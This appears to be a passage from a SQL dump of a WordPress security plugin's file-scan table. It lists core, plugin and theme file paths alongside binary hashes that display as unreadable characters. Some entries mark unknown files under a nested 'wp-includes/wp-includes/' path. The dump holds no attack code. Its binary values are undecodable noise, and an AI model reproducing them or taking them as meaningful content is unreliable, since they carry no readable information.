ރ�)','',0,'?'),('���\n(q���?�}v','wp-includes/wp-includes/feed-rss2-comments.php',0,'L��6<�v�z�L','L��6<�v�z�L','�3۸�kH��?�1B�g#~<X��gbe�','',0,'?'),('��o����CS�;C��','wp-content/plugins/wordpress-seo/css/dist/score_icon-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xac�49y�VM��ޯ','kA�T�flA�RM�X�7ݿ~.�We�lS���','',0,'?'),('��Z��(���|��Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QU�p~ocÊ4�Nt��','�L��n�l2@ΐ�>h�i,uJY�H��\\�L�,�B','',0,'?'),('�┬�E��+,����','wp-content/plugins/wp-cerber/jetflow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��r��z�Ѭ�[','���:����A\0�\"b�Np�s}���&XA�Ee\r>','',0,'?'),('��\\ ��Iѻ���,','wp-includes/class-simplepie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�Gظ�������','��*�J��g��<�9�O�-[C�cVl���ߝ','',0,'?'),('��ڙy�2D\na��93','wp-includes/block-supports/layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��L�V9o�g,�%���','S���۫K�/(��t�D�c�{~IC�o','',0,'?'),('���\\�]^�T�ꥊ�','wp-includes/js/dist/vendor/wp-polyfill-url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ON�)54W,�0=�:P','��ޟA�<s�\"����xp&�ޚ�Tȇ���\"','',0,'?'),('�T���H�<&Jv�eӤ','wp-includes/wp-includes/feed-rdf.php',0,'xG�7�%���\0b���','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('��So�R��DZ�J	�','wp-content/plugins/wordpress-seo/css/dist/adminbar-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qN:�v_�-�h P','��J8vr�~��ȶ[�����\r��b��','',0,'?'),('�Oja��\\zm��}���','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�Q�)96+:�-@7','�����U���}�2}Z�Q�&<S��R�9�_@','',0,'?'),('� �\Zy�5ry\"Ns���','wp-content/plugins/wordpress-seo/js/dist/externals/analysis.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x����V׌Hա?��','���^���슄Osՠt�\Z�m�}�����Ł','',0,'?'),('�/&����2�ѡ\rgDs','wp-includes/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wqҦ�����Θ+','���_�q:��z@�����rML��Sn�^9�','',0,'?'),('�5قaܨϘ�	#��bu','wp-includes/js/dist/compose.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YH�\Z�3�9έ�K��','��ރ����[�q����n~,4��y\r�','',0,'?'),('�6�X9������4�Y','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/cs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|���ĉ��','��JJȆ\Z��8��:������酝�!_M�','',0,'?'),('�=�#��-���38','wp-includes/blocks/code/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0<o,�%S�]Zn�S�','.��D_O�Dч�|Au�s��݇g4��e��','',0,'?'),('�>ڤXg\rs�u#�X','wp-content/plugins/wordpress-seo/admin/views/class-yoast-integration-toggles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڻ�;B�Z�gj�F\"�','`�?��{G�TW��%�,sf\Z���61w:e','',0,'?'),('�Sߙ\0��c�ƕ`4�','wp-includes/blocks/navigation/view.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a���ٵQ�y���','��jNm�JM�E�t����1���_<lLs�','',0,'?'),('�dSp@���\\��0)�q','wp-content/plugins/wordpress-seo/src/routes/route-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�䶈Hu,����','M��\0un~��׃�X�T��T���,K8U��','',0,'?'),('�se������(d*G�}','wp-includes/wp-includes/functions.php',0,'�.���$[L�$�۫�','�.���$[L�$�۫�','sF���z ��v�j���*�	Q��w�0�ov','',0,'?'),('�z�s��w�K����S�','wp-includes/wp-includes/feed-rss2.php',0,'��lN+�5	��O?','��lN+�5	��O?','�@!�`C��*Me��z�j@	�@���L�jw�','',0,'?'),('����=��Ѷ�8$�','wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/2�;����(��U���','i-���;R�9��s�	�bl��:XJ$�K�	�','',0,'?'),('��?�0|��5uơ��','wp-admin/custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㽫��]0�m7��d','Z�5\"=�\0�T�σqr�/0��Q�X^dn6','',0,'?'),('��<eJ���5}��j','wp-includes/blocks/site-logo/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','efxT����0V5�B�','1J�ܡD�[?4x^�Z���$D�V�9�Jx�\n�','',0,'?'),('����]��E�HaɊ�','wp-content/themes/hitmag/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m?�|��$OM�H@','\\;ZM��\n1K�p���^����,u22�\\�Ѣ','',0,'?'),('���qh�n�J�j�','wp-admin/css/nav-menus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�,��4;1&�Io','��vQ��tP!t�? ���]��F.0�d�H','',0,'?'),('���<�	�f%�n�O�','wp-admin/includes/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8[X{��˓�\rW��\'�','MWi�EnRQ~�*g�2|�=���%�7:�','',0,'?'),('�ÏuL�,�&Ǒ�\r1','wp-admin/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Yj���s�{tؾ�I','�p��<+q��dI���_\Z��Wy��l�{�:3�','',0,'?'),('���ꌰ;�A��؀D','wp-includes/wp-includes/js/customize-preview-widgets.js',0,'y�}�����x��c�&�','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('�Ӏ9[�M-g��','wp-includes/js/dist/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{;b��2��&$�o�','��]BG�x�4�!�o�&Pt\"����s�X4�','',0,'?'),('��%I���}�P�zW��','wp-includes/random_compat/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��o�)�����d��','�Z��9�@-���B�xi�U��M?�q!��0�','',0,'?'),('�ḽ3�\0��XZ�<�\Z','wp-content/themes/hitmag/inc/customizer/assets/imgs/2cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','` �0�V}���I1�L�','�B2CI�D�#PF^��&�p����u7�����;','',0,'?'),('��l��;+�S�G��','wp-includes/blocks/audio/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��o���b~��)8','v�{G�dT��*ȡ�����R[<�4C��','',0,'?'),('��-��\n;�<�)�\Z','wp-includes/wp-includes/js/plupload/moxie.js',0,'�#C\r��5DZ�ǒ����','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('���`����Gl�йE','wp-includes/wp-includes/js/jquery/ui/effect-fade.js',0,'�rs�J��7O,��','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('��{Z��V���$��','wp-includes/blocks/social-links/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1m�	�L�F	),XZ','.��m�vP4R�#�Y]%蠯x+v\\z��nQ\'','',0,'?'),('���E\Z����հ_�','wp-content/plugins/wp-cerber/assets/flags/sa.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\D��6�6Axh;\Z�','�9[�4u�,`,*�q.\r���\0�M�7cu�kǰi','',0,'?'),('��+M�%��]�sD00�','wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�F��j�r�~��,','<\n��\nk��]�eSGA�%S�/p&<u��x','',0,'?'),('����G2V�D�m�L>','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/AccessTokenInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E����A��<Y;','�A�LY��.��	���qڨH(5m��&_��G','',0,'?'),('���-fR ��\Z','wp-content/plugins/wp-fastest-cache/images/button-back-green.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','之s�n��K�Y0޴n�','|-�g�!�\Z�ǀ��1�.�T�8t��3��wm','',0,'?'),('��E��r�)��a�H\\','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��27���z\'���^','��;@^4,w��4���߻P#lI=�2���N','',0,'?'),('� )�!h$R�Uvx�ƺ�','wp-content/plugins/wordpress-seo/src/integrations/primary-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӳ� H��� ̝��Us�','}ޚ:�M�)c��ϝ%�NBV���!u��l{','',0,'?'),('�(dwI\0:\r��Xx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v��[���A.F3D�','@��ړ�V�C�+��<!;@8���9�(�n=�G','',0,'?'),('�,3.0m�ʖ��K,T','wp-content/plugins/redirection/locale/redirection-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K���m���Q�H�','���[Ӗ���,xV@����\Z\\\'��E�','',0,'?'),('�/�����3�J�','wp-includes/wp-includes/js/wp-auth-check.min.js',0,'*�L�A��`�2ڴ�Hd','*�L�A��`�2ڴ�Hd','O���f����s����0B��9��Z_��2','',0,'?'),('�3�,���cv�k���','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','М���������s�','��a:�F���V�W�5W�<n�o`��','',0,'?'),('�7ʏ��aB�Kz','wp-includes/blocks/button/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�.��U�1����','�\'�Sңx~�� d����a:h]?����ݙƋ�','',0,'?'),('�AM(�c�� {>;','wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-keyphrases-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��d��9���p','�5��X�L\0K0�\\V��/�+����\"��','',0,'?'),('�P\'i2�+(����7�+T','wp-content/themes/hitmag/template-parts/related-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9K1�>R���%^','Y�o��T���L�ρ����55)%?��ݍ`z=�','',0,'?'),('�WM��{h���(��','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�����e�ډT�a��','\nS��x�B�[��)ɩL�6ۖ>���Hϫܥ��','',0,'?'),('�Y��/<��k�@H�U','wp-includes/wp-includes/css/dist/block-editor/style.css',0,'�Ţ%	\Z�@1<��L��','�Ţ%	\Z�@1<��L��','Z]��5�㮊���c-N�|Wr��*#�H�U=E','',0,'?'),('�]K{�ٯ��`�{�,','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+E�YH��<YPK=�S','ۋ�&�:^���G���&B���2�PC��~���','',0,'?'),('�a�@o��\'��kb��','wp-includes/js/jquery/jquery-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�m���b���iC\0�','wp-content/plugins/wp-cerber/assets/flags/kg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��r��Fo�)=�<','o�:�q�v����l�CW���\"wCȺ�Z�','',0,'?'),('�q���?�)v�^MV�','wp-includes/wp-includes/js/media-models.js',0,'�wɊ��Ur���c[2','�wɊ��Ur���c[2','�Q�疁�n�s;�;��Z�<☱4K;~{','',0,'?'),('�w�hI¹>�@v�J1','wp-content/plugins/wordpress-seo/src/config/migrations/20190529075038_WpYoastDropIndexableMetaTableIfExists.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZmK+O�^��FF�','T��A�t��p9��(d@�5�T+�����k','',0,'?'),('�x;_�q��*`<','wp-includes/blocks/group/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=>���*��f��[���','ϩ���z��J&�O{|K�^�֤�0.�1t','',0,'?'),('�x�s$�9��t(�d','wp-content/plugins/wp-smushit/_src/js/modules/bulk-smush.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��(�`�$NN�J<','ǣF��9{���槙��\nA�{G�#VB�','',0,'?'),('�|��t���\r����','wp-content/plugins/redirection/locale/redirection-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g\\��5o�rzC','2�@���e���\Zb��\nL�%+s�\\�)(�z','',0,'?'),('��i/�pEt�\n�l�','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r���0mb74$','�{h��D��X�^�w���6D�fc�@Q��\r�f','',0,'?'),('��/�H�,���/�v�','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/QRDataAbstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\ZO������c�\'�','�8x�Q�،u��W��P��p��p\0�7�7��I:#','',0,'?'),('����2��?!�u�܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[(AɊ�����h�','����ͳߘ�Q6̨!*���X�x��MM�u@','',0,'?'),('��)�Ы�����NT�','wp-content/plugins/wordpress-seo/src/services/health-check/page-comments-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9W��Go}sy','��癰\n4̳����6�4�=�@9��H_','',0,'?'),('����^[X��i�	�','wp-admin/themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �K�\r��w0�','�����폖��-ȷNkjB yYl�Ll�\'cn�','',0,'?'),('��:�X��@\0{*�֯�','wp-admin/includes/class-language-pack-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�/�Q%�@��,)l��\Z','A�V�E]{�Q!�����T��Í���6e[{.�','',0,'?'),('����=��?���H�','wp-content/themes/hitmag/inc/kirki/controls/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\'٤�Z.�W;��{�','�֙��?�AH�>Xg�jd1cd\0�W��,','',0,'?'),('��,����c��RzW�9','wp-content/plugins/wordpress-seo/src/conditionals/jetpack-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\Z&s\n��','���խ��I�b[�GY��0̢X�v��k�M�','',0,'?'),('��4T�(�\\9\'��3�)','wp-admin/css/customize-widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��F�+N��q.V[�','a���E-n�Ae��=R=:.CC\\�t���Z*���','',0,'?'),('���\0n:T�q}K �@','wp-includes/Requests/Exception/HTTP/408.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�W��p�]\'zAz�','�q���*�lmKңk�\"�M�Q?�p���a؂�4','',0,'?'),('��k{��&��x\n��','wp-includes/class-wp-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3���]�kY�','ʳ�t�̱��@��p.�6�/�i)�t`��,nV�','',0,'?'),('��$�o��1�T�2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��d*W�����1g�','�+q�~;f�E_�#�]I�V�\\�k?l���ÝϞ�','',0,'?'),('��,I��ѽJ\rzR�jN','wp-content/plugins/wp-fastest-cache/templates/cdn/other.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�ƙn)M�%��T�iy','2|<�6	�`�w�↨�T�� �HW���Y-','',0,'?'),('���A0f��f`� Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_��\Zxu��v','��u���;IV��a[�~㵭�TZ\\^�yJ��j','',0,'?'),('��`B�u�-�\rǒ�','wp-content/plugins/wp-fastest-cache/inc/admin-toolbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qz��|.[�o,%�','Y�3O*�K�=dRm���I`�\'��S`\\�','',0,'?'),('��_4za^*�F�+��E','wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-modules-webfonts-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"����*R^�Ep,','�k���fJ\'4b�>rOP*|�ql�Mo�ӥ�N�','',0,'?'),('����VFN	؀#{��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U����K�CLv}/+I','��6�aCe\n�ڻ5t=$(�p�����ݟ�','',0,'?'),('�\0��%3[$x\0��.��(','wp-admin/images/marker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�*O2/�3I2���','~T�@\\��vUI<�pK����a`T�@c��ca�','',0,'?'),('���4�����=��','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʖ�Ѵ��~f���i�','�ߩ0�ԍ���Ѧ�ƻH\n�����¡;�','',0,'?'),('�	���Em[�����l�<','wp-includes/js/tinymce/plugins/image/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��ZC�l­}�莐�','y��T��Nz+����⃆��\'��%Y�','',0,'?'),('�m���$V4/���','wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js',0,'����6�l�UOaD�Q�','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('�����L��\Z��','wp-includes/blocks/query-pagination/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G\\xP�\n�����\'�)\\C','^K���7*Y�hI�j�S	�*�s��0��e�A$��','',0,'?'),('�6��i��Z(�qa','wp-content/plugins/wordpress-seo/src/presentations/indexable-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�t���b�x,�(�vV','�p6�j���|׳O�*t���y�����l�Ĝ��','',0,'?'),('�OT��ɛ�w���:�F','wp-includes/wp-includes/js/media-editor.js',0,'��@4Va�ˣ������','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('�_)BIR�Xo0ֵl��','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-static-home-page-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2}��f,N�z�\\�b','�E�-�h$$^��\Z?�G��\\�4�QxH\"�SQ','',0,'?'),('�y��^��)�k�l','wp-includes/wp-includes/widgets/class-wp-widget-links.php',0,'�x�/k�h\n��ֽ[Nv	','�x�/k�h\n��ֽ[Nv	','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('��\r�5�4.��[�.E\"','wp-content/plugins/wp-cerber/assets/flags/mv.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��()�ȼ�{�x��','�/��Q�myO�&�#�b�l����8\'���p��j�','',0,'?'),('��W��Q��i�b#��\\','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css',0,'�%/NqOR�g��+\\�','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��{�]\\ֵ�	��d��','wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�Gfޯ����(kq�','5�K�Y���<��np�U�3HYI)?u�)','',0,'?'),('��\n�fQ8Wm��=�R','wp-content/plugins/wordpress-seo/admin/class-bulk-title-editor-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X)�/�Hp�XX恑#�','4���.��9�L�`��r.+.�\0f�㱘�','',0,'?'),('�����PhP�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/it.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�q�d��&���S�V','��BI�F����<l� za�!���XZ9c7','',0,'?'),('��T�p0�]o�b���[','wp-includes/blocks/post-comments-form/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2����G�\"���','-�0\'J�M”�ü�� z��	�byp��կ','',0,'?'),('�������\"�R�Ŝ','wp-includes/images/crystal/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('���c};��X�)�','wp-content/plugins/wp-cerber/assets/flags/ye.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��o�r7�Ӕ:�','�%�����Tډv�S��j]��ɯ�\Z��8�','',0,'?'),('�#bP���a���14�lZ','wp-includes/wp-includes/class-wp-http-proxy.php',0,'@U,�:��-<I�e��','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('�%��+~���R1��҉','wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�6�\r�������\n�]�','wp-content/plugins/wordpress-seo/images/Yoast_SEO_negative_icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��x�z���\r�X','���*�Ħk-�G(a\Z����twތ��.����','',0,'?'),('�7��Kђ�*��Z�\"+','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lY�Z�iਆ�3\02[','(��A#��F���~+���Fgh��S�.�b','',0,'?'),('�HZ�(_���W�B��','wp-content/plugins/wp-smushit/core/class-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=Lǽ��Y�)8`��g','P�K�#+�bq���\"���gʒ�$\rź܉ͭ�\\','',0,'?'),('�H��8З��2��E�6','wp-content/plugins/wordpress-seo/src/integrations/admin/disable-concatenate-scripts-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x\0)�\\b����6	Y���','ؒ��R�R<��Ef�:&<A1{ ]|ꀆ0d','',0,'?'),('�YJ��O�Π�*Z���','wp-includes/blocks/post-author/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6hx�6I��20φ�|�g','4�\Z&{�b�|��G#�f^3��)!h��0x�z�','',0,'?'),('�i%���F�A�j]m��','wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h]�nO�\Z!2��y','ގ�o��Aß��Y�B>eR-�$��S������','',0,'?'),('�s�t]H�������\n','wp-includes/js/dist/edit-site.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#E���\Zgk��','�O�O��;�%��{���r� f�Y�0vD��U','',0,'?'),('�v%���S�[�̪�Ѿ','wp-includes/ms-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b�n<�nEy#Q','���n�K�����B��\nx��,�X��y����','',0,'?'),('�~���^;�5��','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��2J娳�YB瘱�','\ZP�L㨒���Zi�t�A�������7d�','',0,'?'),('���rsa���9SUU��','wp-includes/blocks/post-featured-image/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��	\\����8��\n�','��o�Ӱ��lZwF��c��r+�t<%3Q�򯚼','',0,'?'),('������v�yL��e��!','wp-includes/blocks/post-terms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m/�օ�Hd];�','�Ν=���C��2T��I�#�υg𝓉','',0,'?'),('������W�Q��ʠ\Z�','wp-includes/wp-includes/js/dist/compose.js',0,'R6�\\J��\"5r���','R6�\\J��\"5r���','h��l�2������<��_9��x����C�ҏ','',0,'?'),('���|X%jgu@�CJ�M','wp-includes/js/dist/vendor/react.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���?�װ��\0(��l�','L��/��z�C�r؋�[�E��#IJ#8\0(u��W�','',0,'?'),('��i���<���?�?m�','wp-includes/wp-includes/css/buttons-rtl.min.css',0,'F��X�WDw����ڭ�','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('��\'^�����,�h�','wp-content/plugins/redirection/models/url/url-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��̕���!:fLu$��','g�E n�L��D�%�\"U0\09\0Omn�<˟�NP�','',0,'?'),('�ւxRa��ǜ�@','wp-includes/css/dist/editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qg:����%�����','\0�w�`�2n���x��.M�{/�m�fn)fl','',0,'?'),('��c�=�� ����K','wp-content/plugins/wp-cerber/assets/flags/wf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(���%if�>1�Q�','1�ƗI�-�>��Ẁ�FA2ВৡΡ;-','',0,'?'),('���X\"�-{��$48sx','wp-admin/css/deprecated-media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�Re�CX&�����n','QU)š�� Ɵ�l�Q d׶���+8�V΀�','',0,'?'),('���\r��Z���O[΅f�','wp-includes/blocks/columns/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)��i-$�``���','�����K1f�X��$jE���Dp�� yh\n�','',0,'?'),('��Ud��M���S$�l','wp-admin/includes/class-wp-list-table-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�>\r_D\"��Ck��C','\\�;��]\"���(+/��}�˚q5��NS\'�','',0,'?'),('�\rz��@�_Ð�m�dM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�96�f����;���0','mgc%�i\Zn�A��B�@��wF�z�;�y`\rN','',0,'?'),('�8�FM-<8~����<�','wp-includes/wp-includes/images/arrow-pointer-blue-2x.png',0,'%m�rތ]4�9c�','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('�@G��t�eY�\\\'>�O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��iC���^Ao*�','��\'iU�\'FL��[�	5��\'*���a8MgG�>','',0,'?'),('�D1I��i��r�f\'���','wp-content/plugins/wp-smushit/_src/react/modules/configs.jsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W`�p�s\r�!�[��','������=�ԹSoB�����}��I]','',0,'?'),('�G︈�g�����pΊ','wp-includes/blocks/quote/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�k��,��4�','�T3���C)���Y�8��9��Z�N]�e��','',0,'?'),('�K����t3ӳ��\'b','wp-content/plugins/wordfence/css/activity-report-widget.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�^x;y�����c���','�ӡ��f�aM�Wv+�W�%}��`D�N��','',0,'?'),('�Z��Wt�p�N�h','wp-admin/css/nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���e�Dw��\\o','��rR�m�K:J��Q<�jV;��,����n�','',0,'?'),('�\\� M*_�Y��YRp|','wp-content/plugins/wordpress-seo/admin/views/tabs/tool/import-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~c48m�?��c�\ZX�$h','�h/5o�-���e�O������(c�/B59�','',0,'?'),('�m�a#$s�m�x���Q','wp-includes/blocks/template-part.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[���ﮤ�W>ܝ',':��_E������y�V�,�\Z;���C��','',0,'?'),('��#;��e��O\"��#[','wp-includes/blocks/shortcode/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4>c�S�/\"�؇$��v','�ky�}�r�C��\"�Q}�3��i��$>V�','',0,'?'),('��Z 